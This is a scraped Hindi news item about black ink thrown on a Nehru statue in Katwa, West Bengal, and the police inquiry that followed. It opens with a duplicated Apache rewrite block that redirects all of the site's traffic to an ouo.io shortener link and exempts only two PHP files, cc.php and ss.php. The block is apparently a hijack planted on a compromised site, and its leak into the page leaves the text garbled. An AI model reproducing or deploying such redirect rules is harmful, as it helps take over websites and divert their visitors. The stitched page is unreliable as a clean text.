
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 298
Previousकोलकाता। त्रिपुरा में लेनिन की प्रतिमा गिराए जाने के बाद प्रतिमाओं को नुकसान पहुंचाने की घटनाएं थमने का नाम नहीं ले रही है। ताजा मामला पश्चिम बंगाल के बर्दवान जिले का है। यहां के कटवा टेलिफोन मैदान में शुक्रवार देर रात देश के प्रथम प्रधानमंत्री जवाहर लाल नेहरू की मूर्ति पर काला रंग फेंक दिया गया। घटना सामने आने के बाद लोगों मे रोष है। मीडिया रिपोर्ट के मुताबिक कुछ असमाजिक तत्वों ने नेहरू की प्रतिमा पर स्याही फेंकी। बदमाशों ने मूर्ति को तोडऩे की कोशिश की लेकिन वे इसमें नाकामयाब रहे। घटना की जानकारी मिलते ही पुलिस मौके पर पहुंची और शिकायत दर्ज कर जांच शुरू कर दी है। फिलहाल, पुलिस ने मूर्ति की सफाई करवा दी है। स्थानीय निगम अधिकारी भी मामले की अपनी ओर से जांच कर रहे हैं। स्थानीय तृणमूल कांग्रेस विधायक ने कहा है कि इसके पीछ कुछ राजनीतिक तत्वों का हाथ है जो राज्य की कानून-व्यवस्था को खराब करना चाहते हैं। उन्होंने पुलिस से जल्द अपराधियों को पकडऩे को कहा है।